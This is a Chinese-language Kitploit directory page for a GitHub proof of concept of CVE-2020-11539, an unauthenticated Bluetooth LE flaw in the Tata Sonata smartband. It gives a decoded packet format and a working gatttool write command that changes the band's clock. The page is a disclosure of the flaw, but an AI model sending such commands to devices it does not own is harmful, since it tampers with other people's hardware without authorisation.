Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-11539 — Tata Sonata Smartband 中的访问控制不当 | Kitploit
工具/GitHubGitHub/the-girl-who-lived/cve-2020-11539
蓝牙安全物联网安全漏洞分析漏洞利用无线安全硬件与物联网安全
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Tata Sonata Smartband 中的访问控制不当

查看仓库
11336年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-11539:Tata Sonata 智能手环存在不当访问控制

信息

描述: 已识别出该智能手环没有配对(BLE 安全级别模式 0),空中传输的数据未加密。此外,发送到智能手环的数据没有任何身份验证或签名验证,使得任何攻击者都能控制智能设备的参数。

影响版本: Smart SF Rush - 1.12

研究人员: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE 链接: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

概念验证漏洞利用

描述

以下数据包被逆向分析发现用于更改时间,通过从手机提取 hcisnoop 转储可以逆向出更多数据包。

  1. 数据值: 00870e00141401060712052b051e

    数据十六进制:00870e00141401060712052b051e
    数据十进制:00135140020200106071805430530
    • 00 87: 数据包头
    • 0e 00: 数据包类型
    • 14 14: 年份的十六进制(2020)
    • 01 06: 月和日(1月6日)
    • 07 12: 小时和分钟的十六进制(07:18AM)
    • 05: 秒
  2. 发送以下 Gatttool 命令以控制智能手环的时间:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

概念验证视频:

下载工具